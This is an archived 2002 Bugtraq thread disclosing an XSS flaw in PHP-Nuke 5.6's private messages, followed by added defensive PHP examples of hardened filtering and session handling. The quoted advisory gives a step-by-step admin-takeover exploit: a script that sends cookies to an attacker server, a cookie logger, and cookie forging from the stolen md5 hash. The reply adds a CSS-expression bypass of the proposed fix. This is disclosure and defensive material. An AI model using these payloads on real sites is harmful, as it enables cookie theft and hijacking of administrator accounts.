Re: PHP-Nuke v5.6 - Users can compromise admin accts.

From: Jelmer (jelmerat_private)
Date: Thu Aug 15 2002 - 16:08:17 PDT


    IMHO this whole email is just stating the obvious. On top of that the
    proposed fix is flawed.
    
    The PHP strip_tags function does not strip attributes, so this is possible in
    your proposed fix:
    
    <a done=false STYLE="visibility : hidden; word-spacing : expression(
    !(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 );
    word-wrap : expression(this.done=true);"> test</a>
    
    It's a bit messy but gets the job done. It works by using CSS expressions (a
    feature afaik native to Internet Explorer) in the style tag.
    
    --
     jelmer
    
    ----- Original Message -----
    From: "<-delusion->" <delusi0nat_private>
    To: <bugtraqat_private>; <webappsecat_private>
    Sent: Thursday, August 15, 2002 10:30 AM
    Subject: PHP-Nuke v5.6 - Users can compromise admin accts.
    
    
    > Tested on PHP-Nuke v5.6 with Mozilla on Linux
    > (should work on past versions and on most browsers)
    >
    >  Impact:
    >  ---------------------------------------------
    >  Allows any user to get admin access to a PHP-Nuke site.
    >
    > Summary:
    > ----------------------------------------------
    > Due to an XSS flaw in PHPNuke's Private Messaging module, users can send
    > messages with html code that will be executed without any filtering. In old
    > PHPNuke versions XSS allowed theft of cookies which stored passwords in
    > base64 encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before
    > it encodes it into base64 and puts it into a cookie. This made stolen cookies
    > useless if the attacker just tried decoding the base64 encrypted pass,
    > because he just got the MD5 encrypted pass.
    >
    > Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass
    > with the encrypted one in the database, i was able to use the md5 encrypted
    > pass i got from the stolen cookie to authenticate myself.
    >
    > PHPNuke sets cookies by base64 encoding a string that looks like this:
    >
    > username:md5_encrypted_pass:lang
    >
    > Since i can get the md5_encrypted pass all i have to do is launch a script
    > that base64 encodes a string like the one above, and sets it as a cookie on
    > my box.
    >
    > Exploit:
    > -------------------------------------------------
    > For this exploit to work, you must create the following files in your web
    > server's directory.
    >
    > cookie.php containing this:
    > <?
    > $fp = fopen("cookie.txt","a");
    > fputs($fp, $cookie);
    > fclose($fp);
    > print "Message Not Found!"; /* this is so the admin doesn't get scared and
    > thinks it's some bug. */
    > ?>
    >
    > test.php containing:
    > <?
    > $admin = base64_encode("decoded_string") ;
    > setcookie("admin","$admin",time()+2592000);
    > ?>
    > You will find out what to replace decoded_string with..
    >
    > 1. Send an appealing private message to admin containing
    >
    > <script>document.location.replace('http://yourserver/cookie.php?cookie='+document.cookie);</script>
    >
    > 2. Wait awhile until the admin checks the message then check cookie.txt on
    > yer server.
    >
    > 3. From cookie.txt.. copy the encrypted text after admin= and before the ;
    >
    > 4. go to http://www.isecurelabs.com/base64.php paste the copied text, click
    > decode it should give u a string like this:
    > username:md5_encrypted_passwd:language (language may be blank).
    >
    > 5. paste the decoded string into test.php like so.
    > <?
    > $admin = base64_encode("paste decoded string here");
    > setcookie("admin","$admin",time()+2592000);
    > ?>
    >
    > 6. Login as any user on the site
    >
    > 7. send private message to self containing:
    > <iframe src="http://yerserver/test.php"></iframe>
    > Open the message and a cookie will now be set on yer box, but it will be
    > configured with your server's URL.
    > So all u gotta do is replace yer url wit the nuked site.
    >
    > 8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/
    > directory replace the url of yer server to the nuked site,
    > for other browsers just find the Cookie from your server and edit it so
    > instead of showing your url it shows the url of the nuked site.
    >
    > 9. restart yer browser (close and open up again). go back into the nuked
    > site and you are now admin. :D
    >
    > Temp Solution:
    > -------------------------------------------------
    > Edit reply.php in /modules/Private_Messages/ and make $message be stripped
    > of html tags.
    >
    > Go to line 75 in reply.php and add this line:
    >
    > $message = strip_tags($message, '<br><b><u><i>');
    >
    > That will remove any html tags that aren't <br><b><u> or <i>. So it will
    > prevent the XSS.
    > -------------------------------------------------
    > NOTE: I wasn't able to contact the php nuke person, i couldn't find an email
    > on their site, and when i signed up for membership i never got the password,
    > so if u can, let them know asap so they can fix this.
    >
    > Another Vulnerability Brought to you  by,
    > delusion
    > http://digital-delusions.dyn.ee
    >
    >
    >
    
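The reply's objection, shown in code. This is an added example and not PHP-Nuke code or code from either poster: it runs the strip_tags() line proposed in the original post over a constructed message in which an allowed tag (<b>) carries a style attribute, and contrasts it with a filter that escapes everything and then re-enables only bare, attribute-free forms of the allowed tags. The function names and the sample message are assumptions made for the example; the CSS expression is reduced to a generic alert() canary.

```php
<?php
// Added example, not PHP-Nuke code. strip_tags() with an allow-list keeps
// every attribute on the tags it allows, so a style attribute (the vector
// named in the reply) survives the fix proposed in the original post.

// Constructed sample message: an allowed tag with a style attribute, plus a
// disallowed <a> tag to show what strip_tags() does remove.
$message = 'hello <b style="x:expression(alert(1))">bold</b> '
         . '<a href="http://example.invalid/">link</a>';

// The fix exactly as proposed in the original post (hypothetical wrapper name).
function filter_proposed(string $message): string
{
    return strip_tags($message, '<br><b><u><i>');
}

// Hardened alternative (hypothetical name): escape the whole message, then
// convert back only the exact escaped literals of the allowed tags. A tag
// with any attribute is "&lt;b style=...&gt;", never "&lt;b&gt;", so it stays
// escaped and is rendered as text, not markup.
function filter_hardened(string $message): string
{
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_HTML401, 'UTF-8');
    foreach (['b', 'i', 'u'] as $tag) {
        $safe = str_replace(["&lt;$tag&gt;", "&lt;/$tag&gt;"],
                            ["<$tag>", "</$tag>"], $safe);
    }
    // <br> has no closing tag; accept the usual spellings.
    $safe = str_replace(['&lt;br&gt;', '&lt;br /&gt;', '&lt;br/&gt;'], '<br>', $safe);
    return $safe;
}

echo "proposed: ", filter_proposed($message), "\n";
echo "hardened: ", filter_hardened($message), "\n";
```

Run it with `php example.php`: the proposed filter drops the <a> tag but leaves `<b style="...">` intact, so the style attribute reaches the admin's browser; the hardened filter outputs `<b>bold</b>` and shows the <a> tag as escaped text. The re-enable step is case-sensitive and only matches the bare literal, which is the property that keeps attributes out; upper-case `<B>` is simply left escaped.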

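The second problem in the report is independent of the XSS: the cookie is base64 of "username:md5_encrypted_pass:lang", and login compares that md5 with the stored one, so the stored hash is itself a reusable credential. The following added example (not PHP-Nuke code) rebuilds that scheme next to an opaque server-side session id that carries nothing derived from the password. Account data, function names and the in-memory session table are constructed for the example; a real deployment would also replace the unsalted md5 with password_hash()/password_verify().

```php
<?php
// Added example, not PHP-Nuke code. Left: the cookie layout described in the
// post, which anyone holding the stored md5 can mint. Right: an opaque random
// session id that a leaked hash cannot be turned into.

// Constructed sample account; the value is what the database would store.
$storedUsers = ['admin' => md5('example-password-placeholder')];

// Scheme from the post: base64("user:md5(pass):lang"). Note that minting a
// valid cookie needs only the stored hash, never the password itself.
function nukeStyleCookie(string $user, string $md5Password, string $lang = ''): string
{
    return base64_encode("$user:$md5Password:$lang");
}

function nukeStyleVerify(string $cookie, array $users): ?string
{
    $decoded = base64_decode($cookie, true);
    $parts = explode(':', $decoded === false ? '' : $decoded, 3);
    if (count($parts) < 2) {
        return null;
    }
    [$user, $hash] = $parts;
    return (isset($users[$user]) && hash_equals($users[$user], $hash)) ? $user : null;
}

// Alternative: the cookie is only a lookup key into server-side state. It is
// minted solely after a successful password check, expires, and can be
// revoked by deleting the entry.
$sessions = []; // in-memory stand-in for a sessions table

function createSession(array &$sessions, string $user, string $password, array $users): ?string
{
    if (!isset($users[$user]) || !hash_equals($users[$user], md5($password))) {
        return null;
    }
    $id = bin2hex(random_bytes(32));            // 256 random bits
    $sessions[$id] = ['user' => $user, 'expires' => time() + 3600];
    return $id;
}

function verifySession(array &$sessions, string $id): ?string
{
    if (!isset($sessions[$id])) {
        return null;
    }
    if ($sessions[$id]['expires'] < time()) {
        unset($sessions[$id]);
        return null;
    }
    return $sessions[$id]['user'];
}

// With only the stored hash in hand, the old scheme yields a working cookie...
$forged = nukeStyleCookie('admin', $storedUsers['admin']);
var_dump(nukeStyleVerify($forged, $storedUsers));

// ...while the session scheme accepts nothing that was not minted by a login.
var_dump(verifySession($sessions, bin2hex(random_bytes(32))));
$id = createSession($sessions, 'admin', 'example-password-placeholder', $storedUsers);
var_dump(verifySession($sessions, $id));
```

The first var_dump() prints the admin username even though no password was ever supplied, which is the pass-the-hash property the post exploits; the random id fails, and only the id returned by createSession() succeeds. A stolen session cookie is still replayable for its lifetime, so the session id fixes the credential-in-cookie problem but not the XSS, which is why the two fixes are separate.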


    This archive was generated by hypermail 2b30 : Fri Aug 16 2002 - 10:02:25 PDT